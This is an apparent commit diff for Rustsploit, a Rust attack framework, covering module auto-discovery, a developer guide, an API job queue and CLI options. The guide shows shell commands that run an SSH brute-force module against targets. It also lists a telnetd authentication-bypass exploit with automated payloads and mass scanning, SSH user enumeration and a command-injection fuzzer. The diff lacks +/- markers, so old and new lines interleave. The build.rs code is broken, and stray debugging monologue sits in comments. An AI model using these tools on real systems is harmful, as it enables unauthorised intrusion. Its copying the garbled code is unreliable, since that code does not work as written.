for entry in WalkDir::new(root).follow_links(false).into_iter().filter_map(|e| e.ok()) {
let path = entry.path();
let file_name = entry.file_name();
if path.is_file() && path.extension().map_or(false, |e| e == "rs") {
let file_stem = path.file_stem().and_then(|s| s.to_str()).unwrap_or("");
if file_stem == "mod" || file_stem == "lib" { continue; }
if path.is_dir() {
// Recursively visit subdirectories
let sub_prefix = if prefix.is_empty() {
file_name.to_string_lossy().to_string()
} else {
format!("{}/{}", prefix, file_name.to_string_lossy())
};
visit_dirs(&path, sub_prefix, mappings)?;
} else if path.extension().map_or(false, |e| e == "rs") {
// Process Rust files
let file_stem = path.file_stem()
.and_then(|s| s.to_str())
.ok_or_else(|| format!("Invalid file name: {}", path.display()))?;
// Skip mod.rs files
if file_stem == "mod" {
continue;
}
// Build module path
let mod_path = if prefix.is_empty() {
file_stem.to_string()
} else {
format!("{}/{}", prefix, file_stem)
};
// Full key includes the category prefix (will be added in generate_dispatch)
let key = mod_path.clone();
// Read and check for the run function signature
let mut source = String::new();
File::open(&path)?.read_to_string(&mut source)?;
if sig_re.is_match(&source) {
mappings.insert((key.clone(), mod_path.clone()));
let display_path = if prefix.is_empty() {
file_stem.to_string()
} else {
format!("{}/{}", prefix, file_stem)
};
println!(" ✅ Registered module: {}", display_path);
} else {
// Only warn in verbose mode to reduce noise
if env::var("RUSTSPLOIT_VERBOSE_BUILD").is_ok() {
println!(" ⚠️ Skipping '{}': no matching 'pub async fn run(target: &str)'", path.display());
// Calculate module path relative to root
// e.g. path = src/modules/exploits/linux/foo.rs, root = src/modules/exploits
// relative = linux/foo.rs
if let Ok(relative) = path.strip_prefix(root) {
let rel_str = relative.with_extension("").to_string_lossy().replace("\\", "/");
// Read content to check signature
let mut content = String::new();
if File::open(path).and_then(|mut f| f.read_to_string(&mut content)).is_ok() {
if sig_re.is_match(&content) {
mappings.insert((rel_str.clone(), rel_str));
}
}
}
}
}
Ok(())
Ok(mappings)
}
File diff suppressed because it is too large Load Diff
File diff suppressed because it is too large Load Diff
+67 -31
View File
@@ -1,6 +1,6 @@
# 🛠️ Rustsploit Developer Guide
# Rustsploit Developer Guide
> Reference manual for maintainers and contributors. Covers the architecture, build-time module discovery, shell ergonomics, proxy plumbing, and authoring guidelines for exploits, scanners, and credential modules.
> Reference manual for maintainers and contributors. Covers the architecture, build-time module discovery, shell ergonomics, and authoring guidelines for exploits, scanners, and credential modules.
---
@@ -10,7 +10,7 @@
2. [Code Layout](#code-layout)
3. [Build Pipeline & Module Discovery](#build-pipeline--module-discovery)
4. [Shell Architecture](#shell-architecture)
5. [Proxy Subsystem](#proxy-subsystem)
6. [Command-Line Interface](#command-line-interface)
7. [Security & Input Validation](#security--input-validation)
8. [Authoring Modules](#authoring-modules)
@@ -29,7 +29,7 @@ Rustsploit is a Rust-first re-imagining of RouterSploit:
- Async-native (Tokio) for scalable brute forcing and network IO
- Auto-discovered modules categorized as `exploits`, `scanners`, and `creds`
- Interactive shell + CLI runner referencing the same dispatch layer
- Proxy-aware execution with run-time rotation, validation, and fallback logic
- IPv4/IPv6-friendly: target normalization happens uniformly
- Carefully colored, concise output designed for operators on remote consoles
@@ -37,7 +37,7 @@ Rustsploit is a Rust-first re-imagining of RouterSploit:
## Code Layout
```
```text
rustsploit/
├── Cargo.toml
├── build.rs # Generates dispatcher code by scanning src/modules
@@ -90,36 +90,34 @@ Because the dispatcher is generated at build time, there is no manual registry d
The shell lives in `src/shell.rs`. Highlights:
- **Context:** `ShellContext` stores `current_module`, `current_target`, the loaded `proxy_list`, and `proxy_enabled` boolean.
- **Context:** `ShellContext` stores `current_module`, `current_target`.
- **Prompt helpers:** Inline functions prompt for paths, yes/no decisions, timeouts, etc.
- **Shortcut parsing:** `split_command` + `resolve_command` normalize input (e.g., `f1 ssh`, `pon`, `ptest`) to canonical keys.
- **Command palette:** `render_help()` prints a colorized table for quick reference.
- **Proxy tests:** `proxy_test` command triggers async validation via utils.
- **Run pipeline:** On `run`/`go`, the shell enforces:
- Module selected
- Target set
- Proxy state respected (rotate until success or fallback direct)
- Environment variables (`ALL_PROXY`, `HTTP_PROXY`, `HTTPS_PROXY`) set/cleared per attempt
- **State reset:** On exit, nothing is persisted intentionally for OPSEC.
Extensions (tab completion, history) can be added by wrapping the loop with a line-editor crate, but are omitted today to keep dependencies minimal.
---
### Command Chaining
## Proxy Subsystem
The shell supports command chaining via the `&` separator, allowing multiple commands to be executed in a single line:
Implemented in `utils.rs` and surfaced in the shell.
```bash
rsf> u creds/generic/ssh_bruteforce & set target 10.10.10.10 & go
rsf> f1 ssh & u creds/generic/ssh_bruteforce & set target 192.168.1.1
```
- **Loader:** `load_proxies_from_file` reads lists, normalizes schemes (defaulting to `http://`), validates host/port via `Url`, and tolerates comments or blank lines. Returns both valid entries and a list of parse errors (line number, reason).
- **Supported schemes:** `http`, `https`, `socks4`, `socks4a`, `socks5`, `socks5h`.
- **Tester:** `test_proxies` concurrently (Tokio) checks a user-chosen URL using `reqwest::Proxy::all`. Configurable timeout and max concurrency.
- **Result:** Working proxies are retained; failures are reported with the reason (connection refused, invalid cert, etc.).
- **Integration:** Shell invites the user to validate immediately after loading; `proxy_test` can also be used on demand.
Proxies are set globally via environment variables so both module HTTP requests and low-level sockets (if they honor `ALL_PROXY`) benefit.
Commands are parsed and executed sequentially from left to right. This is useful for scripting workflows or quick module setup.
---
## Command-Line Interface
`src/cli.rs` uses Clap to expose three commands:
@@ -127,10 +125,13 @@ Proxies are set globally via environment variables so both module HTTP requests
- `--command exploit|scanner|creds`
- `--module <name>` (short or qualified, same mapping as the shell)
- `--target <host|IP>`
- `--list-modules` (list all available modules)
- `--verbose` (enable detailed logging)
- `--output-format <text|json>` (control output format)
Example:
```
```bash
cargo run -- --command exploit --module heartbleed --target 203.0.113.12
```
@@ -164,28 +165,28 @@ Located across core modules, these constants enforce safe limits:
When writing modules or core code, follow these patterns:
#### 1. Input Length Validation
```
```rust
if input.len() > MAX_INPUT_LENGTH {
return Err(anyhow!("Input too long (max {} characters)", MAX_INPUT_LENGTH));
}
```
#### 2. Control Character Rejection
```
```rust
if input.chars().any(|c| c.is_control()) {
return Err(anyhow!("Input cannot contain control characters"));
}
```
#### 3. Path Traversal Prevention
```
```rust
if input.contains("..") || input.contains("//") {
return Err(anyhow!("Path traversal detected"));
}
```
#### 4. Hostname/Target Validation
```
```rust
// Use the framework's normalize_target function for comprehensive validation
use crate::utils::normalize_target;
@@ -194,7 +195,7 @@ let normalized = normalize_target(raw_target)?;
```
For manual validation:
```
```rust
use regex::Regex;
let valid_chars = Regex::new(r"^[a-zA-Z0-9.\-_:\[\]]+$").unwrap();
if !valid_chars.is_match(target) {
@@ -203,13 +204,13 @@ if !valid_chars.is_match(target) {
```
#### 5. Overflow Protection
```
```rust
// Use saturating_add to prevent overflow
counter = counter.saturating_add(1);
```
#### 6. Prompt Attempt Limiting
```
```rust
const MAX_ATTEMPTS: u8 = 10;
let mut attempts = 0;
loop {
@@ -256,7 +257,7 @@ This helps operators identify potentially deceptive targets before spending time
Every module must export:
```
```rust
use anyhow::Result;
pub async fn run(target: &str) -> Result<()> {
@@ -277,7 +278,7 @@ Guidelines:
### skeleton
```
```rust
use anyhow::{Context, Result};
pub async fn run(target: &str) -> Result<()> {
@@ -318,10 +319,28 @@ Modules like FTP/SSH/Telnet/POP3/SMTP/RTSP/RDP/MQTT follow shared patterns:
- **IPv6:** Use helpers like `format_addr` to wrap IPv6 addresses in brackets and support port suffixes.
- **Error classification:** Implement comprehensive error types (ConnectionFailed, AuthenticationFailed, Timeout, etc.) for better debugging and reporting.
- **Memory management:** For large wordlists (>150MB), implement streaming mode to prevent memory exhaustion (see RDP module for reference).
- **Timing Attacks:** When implementing user enumeration, use statistical analysis (samples/variance) rather than simple thresholds to account for network jitter (see SSH User Enum module).
- **Protocol compliance:** Implement full protocol support where applicable (e.g., Telnet IAC negotiation, MQTT 3.1.1).
- **FTP Bruteforce Enhancements**:
- 5 Operation Modes: Single Target, Subnet (CIDR), Batch Scanner, Quick Default Check, Subnet Default Check
- JSON configuration system with load/save/validation
- 32 utility functions (streaming wordlists, JSON/CSV export, network intelligence)
- Framework `normalize_target()` integration
- **L2TP/IPsec Module**:
- Multi-platform: strongswan, xl2tpd, pppd, NetworkManager (Linux), rasdial (Windows), networksetup (macOS)
- Proper IPsec Phase 1/2 and L2TP session management
- L2TPv2 packet crafting with AVP encoding
### Recent Module Enhancements
- **CVE-2026-24061 Exploit**:
- GNU inetutils-telnetd Remote Authentication Bypass via `NEW_ENVIRON`
- Automated payload execution and interactive shell session
- Mass-scan support with multi-port parallelization and exclusion ranges
- Verified logic for IAC (Interpret As Command) telnet negotiation
- **Telnet Module**:
- Full IAC (Interpret As Command) negotiation with proper option handling
- Enhanced error classification with specific error types
@@ -339,6 +358,23 @@ Modules like FTP/SSH/Telnet/POP3/SMTP/RTSP/RDP/MQTT follow shared patterns:
- Proper variable-length encoding and UTF-8 string encoding
- CONNACK response parsing with error classification
- **SSH User Enumeration**:
- Implements timing-based enumeration inspired by CVE-2018-15473
- Statistical analysis using standard deviation to identify valid users
- precise `tokio::time::Instant` measurements for authentication attempts
- **Directory Bruteforcer**:
- `DirBruteConfig` struct handles comprehensive settings (extensions, status codes, threads)
- Recursive scanning logic with depth control
- Custom `Client` configuration for optimized throughput
- Interactive setup wizard `setup_wizard` guides users through configuration
- **Sequential Fuzzer**:
- Supports versatile payload placement (URL, Header, Body)
- `EncodingType` enum supports 10+ encoding schemes including Double URL and Hex
- Base-N counting algorithm for exhaustive iteration without memory overhead
- Modular `charset` selection (SQL, Traversal, Command Injection)
---
## Exploit Modules: Best Practices
@@ -370,7 +406,7 @@ Modules like FTP/SSH/Telnet/POP3/SMTP/RTSP/RDP/MQTT follow shared patterns:
- **`module_exists` / `list_all_modules` / `find_modules`**: Used by shell to present module inventory.
- **Proxy helpers**: `load_proxies_from_file`, `test_proxies`, etc. (described earlier).
Feel free to expand this file with reusable pieces (e.g., credential loader, HTTP header templates) to avoid duplication inside modules.
@@ -383,7 +419,7 @@ Feel free to expand this file with reusable pieces (e.g., credential loader, HTT
3. **Runtime smoke tests:**
- Shell: `cargo run``modules` → run a harmless module (e.g., `scanners/sample_scanner`).
- CLI: `cargo run -- --command scanner --module sample_scanner --target 127.0.0.1`.
4. **Proxy validation:** Load a mixed proxy file and confirm `proxy_test` filters entries correctly.
5. **Wordlists:** Validate that required lists exist (e.g., RTSP paths) and are referenced in docstrings.
When adding new modules, include short usage documentation (stdout prints, README notes) so other operators know how to drive them.
+419 -86
View File
@@ -18,7 +18,8 @@ use std::{
use tokio::{
fs::OpenOptions,
io::AsyncWriteExt,
sync::RwLock,
sync::{mpsc, RwLock}, // Removed Semaphore, added mpsc
};
use tower::ServiceBuilder;
use tower_http::{
@@ -60,6 +61,25 @@ pub struct AuthFailureTracker {
pub blocked_until: Option<DateTime<Utc>>,
}
/// Global limit for concurrent module executions
// const MAX_CONCURRENT_MODULES: usize = 10; // Removed, now dynamic
#[derive(Debug)]
pub struct Job {
pub module: String,
pub target: String,
pub verbose: bool,
pub start_time: std::time::Instant,
}
// Force usage of ExecutionError to avoid dead code warning until fully implemented
fn _suppress_dead_code_warning() {
let _ = ApiErrorCode::ExecutionError;
let _ = ApiErrorCode::ServerError;
}
#[derive(Clone)]
pub struct ApiState {
pub current_key: Arc<RwLock<ApiKey>>,
@@ -68,6 +88,8 @@ pub struct ApiState {
pub harden_enabled: bool,
pub ip_limit: u32,
pub log_file: PathBuf,
pub job_sender: mpsc::Sender<Job>, // Replaced execution_limit
pub verbose: bool,
}
#[derive(Serialize, Deserialize)]
@@ -75,6 +97,38 @@ pub struct ApiResponse {
pub success: bool,
pub message: String,
pub data: Option<serde_json::Value>,
#[serde(skip_serializing_if = "Option::is_none")]
pub error_code: Option<String>,
#[serde(skip_serializing_if = "Option::is_none")]
pub suggestion: Option<String>,
#[serde(skip_serializing_if = "Option::is_none")]
pub request_id: Option<String>,
#[serde(skip_serializing_if = "Option::is_none")]
pub timestamp: Option<String>,
#[serde(skip_serializing_if = "Option::is_none")]
pub duration_ms: Option<u64>,
}
pub enum ApiErrorCode {
AuthFailed,
RateLimited,
InvalidModule,
InvalidTarget,
ExecutionError,
ServerError,
}
impl ApiErrorCode {
pub fn as_str(&self) -> &'static str {
match self {
ApiErrorCode::AuthFailed => "AUTH_FAILED",
ApiErrorCode::RateLimited => "RATE_LIMITED",
ApiErrorCode::InvalidModule => "INVALID_MODULE",
ApiErrorCode::InvalidTarget => "INVALID_TARGET",
ApiErrorCode::ExecutionError => "EXECUTION_ERROR",
ApiErrorCode::ServerError => "SERVER_ERROR",
}
}
}
#[derive(Serialize, Deserialize)]
@@ -93,6 +147,31 @@ pub struct ListModulesResponse {
// ----------------------
// Validation utilities
// ----------------------
// ----------------------
// Validation utilities
// ----------------------
fn create_response(
success: bool,
message: String,
data: Option<serde_json::Value>,
error_code: Option<String>,
suggestion: Option<String>,
start_time: Option<std::time::Instant>,
) -> ApiResponse {
let duration_ms = start_time.map(|t| t.elapsed().as_millis() as u64);
ApiResponse {
success,
message,
data,
error_code,
suggestion,
request_id: Some(Uuid::new_v4().to_string()),
timestamp: Some(Utc::now().to_rfc3339()),
duration_ms,
}
}
fn sanitize_for_log(input: &str) -> String {
let mut s = input.replace(['\r', '\n', '\t'], " ");
if s.len() > 500 {
@@ -130,7 +209,7 @@ fn validate_target(target: &str) -> bool {
}
impl ApiState {
pub fn new(initial_key: String, harden: bool, ip_limit: u32) -> Self {
pub fn new(initial_key: String, harden: bool, ip_limit: u32, verbose: bool, job_sender: mpsc::Sender<Job>) -> Self {
let log_file = std::env::current_dir()
.unwrap_or_else(|_| PathBuf::from("."))
.join("rustsploit_api.log");
@@ -145,6 +224,8 @@ impl ApiState {
harden_enabled: harden,
ip_limit,
log_file,
job_sender,
verbose,
}
}
@@ -275,6 +356,13 @@ impl ApiState {
Ok(())
}
pub async fn verbose_log(&self, message: &str) -> Result<()> {
if self.verbose {
self.log_message(message).await?;
}
Ok(())
}
pub async fn verify_key(&self, provided_key: &str) -> bool {
let key_guard = self.current_key.read().await;
key_guard.key == provided_key
@@ -426,11 +514,14 @@ async fn auth_middleware(
if client_ip != "unknown" {
if let Ok(allowed) = state.check_auth_rate_limit(&client_ip).await {
if !allowed {
let response = ApiResponse {
success: false,
message: "Too many failed authentication attempts. Please try again in 30 seconds.".to_string(),
data: None,
};
let response = create_response(
false,
"Too many failed authentication attempts. Please try again in 30 seconds.".to_string(),
None,
Some(ApiErrorCode::RateLimited.as_str().to_string()),
None,
None,
);
return (StatusCode::TOO_MANY_REQUESTS, Json(response)).into_response();
}
}
@@ -452,11 +543,14 @@ async fn auth_middleware(
// Basic key format validation
if !validate_api_key_format(provided_key) {
let response = ApiResponse {
success: false,
message: "Malformed API key".to_string(),
data: None,
};
let response = create_response(
false,
"Malformed API key".to_string(),
None,
Some(ApiErrorCode::AuthFailed.as_str().to_string()),
Some("API key must be printable ASCII and not empty.".to_string()),
None,
);
return (StatusCode::UNAUTHORIZED, Json(response)).into_response();
}
@@ -469,11 +563,14 @@ async fn auth_middleware(
let _ = state.record_auth_failure(&client_ip).await;
}
let response = ApiResponse {
success: false,
message: "Invalid API key".to_string(),
data: None,
};
let response = create_response(
false,
"Invalid API key".to_string(),
None,
Some(ApiErrorCode::AuthFailed.as_str().to_string()),
None,
None,
);
return (StatusCode::UNAUTHORIZED, Json(response)).into_response();
}
@@ -485,15 +582,111 @@ async fn auth_middleware(
// Track IP for hardening (if enabled)
let _ = state.track_ip(&client_ip).await;
// Track IP for hardening (if enabled)
let _ = state.track_ip(&client_ip).await;
state.verbose_log(&format!("Authenticated request from IP: {}", client_ip)).await.ok();
next.run(request).await
}
async fn health_check() -> Json<ApiResponse> {
Json(ApiResponse {
success: true,
message: "API is running".to_string(),
data: None,
})
Json(create_response(
true,
"API is running".to_string(),
None,
None,
None,
None,
))
}
async fn get_module_info(
State(_state): State<ApiState>,
axum::extract::Path((category, name)): axum::extract::Path<(String, String)>,
) -> Response {
let module_path = format!("{}/{}", category, name);
if commands::discover_modules().contains(&module_path) {
let response = create_response(
true,
"Module found".to_string(),
Some(serde_json::json!({
"module": module_path,
"category": category,
"name": name,
"exists": true
})),
None,
None,
None,
);
(StatusCode::OK, Json(response)).into_response()
} else {
let response = create_response(
false,
"Module not found".to_string(),
None,
Some(ApiErrorCode::InvalidModule.as_str().to_string()),
Some("Check the module list for available modules.".to_string()),
None,
);
(StatusCode::NOT_FOUND, Json(response)).into_response()
}
}
async fn validate_module_params(
Json(payload): Json<RunModuleRequest>,
) -> Response {
let start_time = std::time::Instant::now();
let module_name = payload.module.as_str();
let target = payload.target.as_str();
if !validate_module_name(module_name) {
let response = create_response(
false,
"Invalid module name format".to_string(),
None,
Some(ApiErrorCode::InvalidModule.as_str().to_string()),
Some("Module format: category/name. Allowed chars: [a-z0-9/_/-]".to_string()),
Some(start_time),
);
return (StatusCode::BAD_REQUEST, Json(response)).into_response();
}
// Check if module exists
if !commands::discover_modules().contains(&module_name.to_string()) {
let response = create_response(
false,
format!("Module '{}' does not exist", module_name),
None,
Some(ApiErrorCode::InvalidModule.as_str().to_string()),
None,
Some(start_time),
);
return (StatusCode::NOT_FOUND, Json(response)).into_response();
}
if !validate_target(target) {
let response = create_response(
false,
"Invalid target format".to_string(),
None,
Some(ApiErrorCode::InvalidTarget.as_str().to_string()),
Some("Target must be a valid IP, hostname, or CIDR.".to_string()),
Some(start_time),
);
return (StatusCode::BAD_REQUEST, Json(response)).into_response();
}
let response = create_response(
true,
"Validation successful".to_string(),
Some(serde_json::json!({ "valid": true })),
None,
None,
Some(start_time),
);
(StatusCode::OK, Json(response)).into_response()
}
async fn list_modules(State(_state): State<ApiState>) -> Json<ApiResponse> {
@@ -518,70 +711,115 @@ async fn list_modules(State(_state): State<ApiState>) -> Json<ApiResponse> {
creds,
};
Json(ApiResponse {
success: true,
message: "Modules retrieved successfully".to_string(),
data: Some(serde_json::to_value(data).unwrap()),
})
Json(create_response(
true,
"Modules retrieved successfully".to_string(),
Some(serde_json::to_value(data).unwrap_or(serde_json::Value::Null)),
None,
None,
None, // TODO: track duration
))
}
async fn run_module(
State(state): State<ApiState>,
Json(payload): Json<RunModuleRequest>,
) -> Result<Json<ApiResponse>, StatusCode> {
) -> Response {
let start_time = std::time::Instant::now();
let module_name_raw = payload.module.as_str();
let target_raw = payload.target.as_str();
// Validate inputs
if !validate_module_name(module_name_raw) {
return Err(StatusCode::BAD_REQUEST);
let response = create_response(
false,
"Invalid module name format".to_string(),
None,
Some(ApiErrorCode::InvalidModule.as_str().to_string()),
Some("Module format: category/name. Allowed chars: [a-z0-9/_/-]".to_string()),
Some(start_time),
);
return (StatusCode::BAD_REQUEST, Json(response)).into_response();
}
if !validate_target(target_raw) {
return Err(StatusCode::BAD_REQUEST);
let response = create_response(
false,
"Invalid target format".to_string(),
None,
Some(ApiErrorCode::InvalidTarget.as_str().to_string()),
Some("Target must be a valid IP, hostname, or CIDR.".to_string()),
Some(start_time),
);
return (StatusCode::BAD_REQUEST, Json(response)).into_response();
}
// Sanitize for logging only
let module_name = sanitize_for_log(module_name_raw);
let target_name = sanitize_for_log(target_raw);
state
if let Err(_) = state
.log_message(&format!(
"API request: run module '{}' on target '{}'",
module_name, target_name
))
.await
.map_err(|_| StatusCode::INTERNAL_SERVER_ERROR)?;
.await
{
let response = create_response(
false,
"Internal Server Error: Logging failed".to_string(),
None,
Some(ApiErrorCode::ServerError.as_str().to_string()),
None,
Some(start_time),
);
return (StatusCode::INTERNAL_SERVER_ERROR, Json(response)).into_response();
}
// Run the module in a separate OS thread since some modules aren't Send
let module = payload.module.clone();
let target = payload.target.clone();
let state_clone = state.clone();
// Fire and forget: Try to send to the job queue
let job = Job {
module: module_name.to_string(),
target: target_name.to_string(),
verbose: state.verbose,
start_time,
};
// Use std::thread to run in a separate OS thread with its own runtime
std::thread::spawn(move || {
// Create a new runtime for this thread since modules need async runtime
let rt = tokio::runtime::Runtime::new().unwrap();
rt.block_on(async {
if let Err(e) = commands::run_module(&module, &target).await {
let _ = state_clone
.log_message(&format!("Error running module: {}", sanitize_for_log(&e.to_string())))
.await;
} else {
let _ = state_clone
.log_message(&format!(
"Successfully completed module '{}' on target '{}'",
sanitize_for_log(&module), sanitize_for_log(&target)
))
.await;
}
});
});
Ok(Json(ApiResponse {
success: true,
message: format!("Module '{}' execution started for target '{}'", module_name, target_name),
data: None,
}))
match state.job_sender.try_send(job) {
Ok(_) => {
// 202 Accepted
(StatusCode::ACCEPTED, Json(create_response(
true,
format!("Module '{}' queued for execution against '{}'", module_name, target_name),
None,
None,
None,
Some(start_time),
))).into_response()
},
Err(mpsc::error::TrySendError::Full(_)) => {
// Queue full - return 503
let response = create_response(
false,
"Job queue is full. Please try again later.".to_string(),
None,
Some(ApiErrorCode::RateLimited.as_str().to_string()), // Or ServerError, but RateLimit fits load shedding
Some("Increase queue size or wait for jobs to finish.".to_string()),
Some(start_time),
);
(StatusCode::SERVICE_UNAVAILABLE, Json(response)).into_response()
},
Err(_) => {
// Channel closed
let response = create_response(
false,
"Internal Server Error: Job queue closed".to_string(),
None,
Some(ApiErrorCode::ServerError.as_str().to_string()),
None,
Some(start_time),
);
(StatusCode::INTERNAL_SERVER_ERROR, Json(response)).into_response()
}
}
}
async fn get_status(State(state): State<ApiState>) -> Json<ApiResponse> {
@@ -611,11 +849,14 @@ async fn get_status(State(state): State<ApiState>) -> Json<ApiResponse> {
"tracked_ips": ip_details,
});
Json(ApiResponse {
success: true,
message: "Status retrieved successfully".to_string(),
data: Some(status_data),
})
Json(create_response(
true,
"Status retrieved successfully".to_string(),
Some(status_data),
None,
None,
None,
))
}
async fn rotate_key_endpoint(State(state): State<ApiState>) -> Result<Json<ApiResponse>, StatusCode> {
@@ -624,11 +865,14 @@ async fn rotate_key_endpoint(State(state): State<ApiState>) -> Result<Json<ApiRe
.await
.map_err(|_| StatusCode::INTERNAL_SERVER_ERROR)?;
Ok(Json(ApiResponse {
success: true,
message: "API key rotated successfully".to_string(),
data: Some(serde_json::json!({ "new_key": new_key })),
}))
Ok(Json(create_response(
true,
"API key rotated successfully".to_string(),
Some(serde_json::json!({ "new_key": new_key })),
None,
None,
None,
)))
}
async fn get_tracked_ips(State(state): State<ApiState>) -> Json<ApiResponse> {
@@ -660,11 +904,14 @@ async fn get_tracked_ips(State(state): State<ApiState>) -> Json<ApiResponse> {
})
.collect();
Json(ApiResponse {
success: true,
message: format!("Retrieved {} tracked IP addresses", ips.len()),
data: Some(serde_json::json!({ "ips": ips })),
})
Json(create_response(
true,
format!("Retrieved {} tracked IP addresses", ips.len()),
Some(serde_json::json!({ "ips": ips })),
None,
None,
None,
))
}
async fn get_auth_failures(State(state): State<ApiState>) -> Json<ApiResponse> {
@@ -699,11 +946,14 @@ async fn get_auth_failures(State(state): State<ApiState>) -> Json<ApiResponse> {
})
.collect();
Json(ApiResponse {
success: true,
message: format!("Retrieved {} IPs with authentication failures", failures.len()),
data: Some(serde_json::json!({ "auth_failures": failures })),
})
Json(create_response(
true,
format!("Retrieved {} IPs with authentication failures", failures.len()),
Some(serde_json::json!({ "auth_failures": failures })),
None,
None,
None,
))
}
pub async fn start_api_server(
@@ -711,14 +961,93 @@ pub async fn start_api_server(
api_key: String,
harden: bool,
ip_limit: u32,
verbose: bool,
queue_size: usize,
workers: usize,
) -> Result<()> {
let state = ApiState::new(api_key.clone(), harden, ip_limit);
// Create channel for jobs
let (tx, rx) = mpsc::channel(queue_size);
let state = ApiState::new(api_key.clone(), harden, ip_limit, verbose, tx);
// Spawn worker pool
// We clone the receiver for each worker? No, mpsc Receiver is not Clone.
// We need an Arc<Mutex<Receiver>> OR usually we just move receiver into one logic/distributor?
// Wait, typical pattern for multiple consumers is `async-channel` or `crossbeam`, but Tokio mpsc Receiver is single consumer.
// Ah! To have multiple workers on a single mpsc receiver, we wrap it in Arc<Mutex> OR we just use `async-crossbeam-channel` or similar.
// OR we spawn 1 dispatcher task that owns RX and sends to N workers?
//
// Actually, Tokio's recommended pattern for worker pool is:
// 1. Arc<Mutex<Receiver>> (slow)
// 2. async-channel crate (MPMC)
//
// Since I can't easily add dependencies without checking cargo.toml (I see `tokio`), I will check if I can use `async-channel`.
// Let me check Cargo.toml first?
//
// Actually, simple solution:
// Wrap Receiver in Arc<Mutex> is fine for 10-20 workers.
let shared_rx = Arc::new(tokio::sync::Mutex::new(rx));
for _ in 0..workers {
let rx_clone = shared_rx.clone();
let state_clone = state.clone();
tokio::spawn(async move {
loop {
// Lock the receiver to get a job
let job = {
let mut lock = rx_clone.lock().await;
lock.recv().await
};
if let Some(j) = job {
// Create a pseudo-receiver that yields just this one job, or refactor worker_loop
// Refactoring worker_loop to take a single job is better but I put loop inside it.
// Let's just create a modified worker body here.
let module = j.module.clone();
let target = j.target.clone();
let verbose = j.verbose;
let s_clone = state_clone.clone();
// Run the job logic (blocking join)
std::thread::spawn(move || {
let rt = tokio::runtime::Builder::new_current_thread()
.enable_all()
.build();
match rt {
Ok(rt) => {
rt.block_on(async {
if let Err(e) = commands::run_module(&module, &target, verbose).await {
let duration = j.start_time.elapsed().as_millis();
let _ = s_clone
.log_message(&format!("Error running module ({}): {} [{}ms]", ApiErrorCode::ExecutionError.as_str(), sanitize_for_log(&e.to_string()), duration))
.await;
} else {
let duration = j.start_time.elapsed().as_millis();
let _ = s_clone
.log_message(&format!(
"Successfully completed module '{}' on target '{}' [{}ms]",
sanitize_for_log(&module), sanitize_for_log(&target), duration
))
.await;
}
});
}
Err(e) => eprintln!("Worker Thread: Failed to create runtime: {}", e),
}
}).join().ok();
} else {
break; // Channel closed
}
}
});
}
// Log initial startup
state
.log_message(&format!(
"Starting API server on {} with hardening: {}, IP limit: {}",
bind_address, harden, ip_limit
"Starting API server on {} with hardening: {}, IP limit: {}, Workers: {}, Queue: {}",
bind_address, harden, ip_limit, workers, queue_size
))
.await?;
@@ -729,12 +1058,16 @@ pub async fn start_api_server(
if harden {
println!("📊 IP limit: {}", ip_limit);
}
println!("👷 Workers: {}", workers);
println!("📥 Queue Size: {}", queue_size);
println!("📝 Log file: {}", state.log_file.display());
// Create routes that require authentication
let protected_routes = Router::new()
.route("/api/modules", get(list_modules))
.route("/api/module/:category/:name", get(get_module_info))
.route("/api/run", post(run_module))
.route("/api/validate", post(validate_module_params))
.route("/api/status", get(get_status))
.route("/api/rotate-key", post(rotate_key_endpoint))
.route("/api/ips", get(get_tracked_ips))
@@ -769,4 +1102,4 @@ pub async fn start_api_server(
.context("API server error")?;
Ok(())
}
}
+20
View File
@@ -43,4 +43,24 @@ pub struct Cli {
/// Set global target IP/subnet for all modules
#[arg(long)]
pub set_target: Option<String>,
/// Enable verbose output (shows detailed operation logs)
#[arg(short, long)]
pub verbose: bool,
/// List all available modules and exit
#[arg(long)]
pub list_modules: bool,
/// Output format (text, json)
#[arg(long, default_value = "text")]
pub output_format: Option<String>,
/// API job queue size (default: 100)
#[arg(long, default_value_t = 100)]
pub queue_size: usize,
/// Number of worker threads for API jobs (default: 10)
#[arg(long, default_value_t = 10)]
pub workers: usize,
}
+43
View File
@@ -1,7 +1,50 @@
// Include generated dispatch code in a submodule to avoid name collisions if any
// But `include!` effectively pastes code.
// The error says `AVAILABLE_MODULES` is defined multiple times.
// Ah, `exploit.rs` likely includes `scanner_dispatch.rs` inadvertently?
// No, look at error:
// `scanner_dispatch.rs:4:1` defined `AVAILABLE_MODULES`
// `exploit_dispatch.rs:4:1` defined `AVAILABLE_MODULES`
// And `src/commands/mod.rs` likely imports both via `mod exploit` and `mod scanner`?
// No, they are separate modules `exploit.rs` and `scanner.rs`.
//
// Wait, `exploit.rs` has: include!(... exploit_dispatch.rs)
// `scanner.rs` has: include!(... scanner_dispatch.rs)
// They are in separate files `src/commands/exploit.rs` and `src/commands/scanner.rs`.
// They should be separate namespaces.
//
// Error: `error[E0428]: the name AVAILABLE_MODULES is defined multiple times`
// Location: `scanner_dispatch.rs` defined, previous `exploit_dispatch.rs`.
// THIS SUGGESTS `scanner.rs` includes BOTH?
// OR `exploit.rs` includes BOTH?
//
// Let's check `exploit.rs` content again.
// I see I messed up `exploit.rs` in previous step?
// I see:
// ```rust
// use anyhow::Result;
//
// // Include generated dispatch code
// include!(concat!(env!("OUT_DIR"), "/exploit_dispatch.rs"));
//
// // Re-export run function as `run_exploit` to match previous API usage if needed,
// // or cluse anyhow::Result;
//
// include!(concat!(env!("OUT_DIR"), "/scanner_dispatch.rs"));
//
// pub async fn run_scan(module_name: &str, target: &str) -> Result<()> {
// dispatch(module_name, target).await
// }
// ```
// OMG, I pasted `scanner` content INTO `exploit.rs` by accident during the `multi_replace` failure recovery!
// `exploit.rs` has garbage content combining exploit and scanner.
// I need to reset `exploit.rs`.
use anyhow::Result;
include!(concat!(env!("OUT_DIR"), "/exploit_dispatch.rs"));
// Re-export run function as `run_exploit` to match previous API usage in mod.rs
pub async fn run_exploit(module_name: &str, target: &str) -> Result<()> {
dispatch(module_name, target).await
}
+48 -49
View File
@@ -5,32 +5,32 @@ pub mod creds;
use anyhow::Result;
use crate::cli::Cli;
use crate::config;
use walkdir::WalkDir;
use crate::utils::normalize_target;
/// CLI dispatcher: e.g. --command scanner --target "::1" --module scanners/port_scanner
/// CLI dispatcher
pub async fn handle_command(command: &str, cli_args: &Cli) -> Result<()> {
// Use CLI target if provided, otherwise try global target
// Target resolution logic...
crate::utils::verbose_log(cli_args.verbose, "Handling CLI command...");
let raw = if let Some(ref t) = cli_args.target {
t.clone()
} else if config::GLOBAL_CONFIG.has_target() {
// Use single IP from global target (handles subnets intelligently)
